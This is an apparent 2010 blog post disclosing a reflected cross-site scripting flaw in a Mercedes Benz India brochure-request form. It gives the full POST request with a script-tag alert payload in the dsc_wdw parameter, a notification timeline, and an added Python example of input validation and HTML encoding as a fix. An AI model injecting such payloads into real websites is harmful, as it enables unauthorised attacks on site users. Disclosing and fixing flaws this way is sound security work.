Sunday, June 20, 2010

Mercedes Benz Cross Site Scripting (XSS)

+++About Mercedes Benz+++

+++Affected URL(s)+++

+++Vulnerable Parameter / Function+++

Home Page -> Request Brochure
Vulnerable parameter -> @dsc_wdw

+POST Request+

;jsessionid=0000fct1dbQH_OtagtCR9h9ZhZj:14k117133?subprocess=RQBc_Cars&locale=en_IN&site_locale=en_IN

dsc_lnk=sn_step2&dsc_pg=p1302&dsc_wdw='<script>alert("Mercedes.Benz Vuln to XSS")</script>&dsc_lnkapx=&historyBack=true&lastPage=p1302a&p1302.mtxCar%5B0%5D%5B0%5D=car002
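
What a server-side fix for this parameter could look like, as an added example (not code from the affected site or from the original post): it parses the POST body reported above, rejects navigation fields that are not plain identifiers, and HTML-encodes the value before it is echoed back. The identifier allowlist and the hidden-input template are assumptions; the post does not show how the application uses or reflects dsc_wdw.

```python
import html
import re
from urllib.parse import parse_qsl

# POST body copied from the report above.
REPORTED_BODY = (
    "dsc_lnk=sn_step2&dsc_pg=p1302"
    "&dsc_wdw='<script>alert(\"Mercedes.Benz Vuln to XSS\")</script>"
    "&dsc_lnkapx=&historyBack=true&lastPage=p1302a"
    "&p1302.mtxCar%5B0%5D%5B0%5D=car002"
)

# Assumption: the form's fields only ever carry short identifiers
# (sn_step2, p1302, car002, true), so anything else is rejected outright.
IDENTIFIER = re.compile(r"[A-Za-z0-9_]{0,32}")


def parse_form(body):
    """Decode an application/x-www-form-urlencoded body, keeping empty fields."""
    return dict(parse_qsl(body, keep_blank_values=True))


def rejected_fields(form):
    """Return the names of fields whose decoded value is not a plain identifier."""
    return sorted(k for k, v in form.items() if not IDENTIFIER.fullmatch(v))


def render_hidden_input(name, value):
    """Echo a field into HTML with attribute-safe encoding (hypothetical template).

    quote=True also encodes ' and ", so the leading quote in the reported
    value cannot close an attribute and the tag cannot start an element.
    """
    return '<input type="hidden" name="%s" value="%s">' % (
        html.escape(name, quote=True),
        html.escape(value, quote=True),
    )


if __name__ == "__main__":
    form = parse_form(REPORTED_BODY)
    print("rejected:", rejected_fields(form))
    print(render_hidden_input("dsc_wdw", form["dsc_wdw"]))
```

Validation and encoding are complementary: the allowlist stops the request early, and the encoding keeps the page safe even if a field is later exempted from validation.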

Mercedes Benz first notified: January 22, 2010
Second notification: June 15, 2010
Response Received: None
Current Status: Vulnerable (As of today, June 20, 2010)

Best Regards.



The views, information & opinions expressed in this blog are my own and do not reflect the views of my current or former employers or employees or colleagues.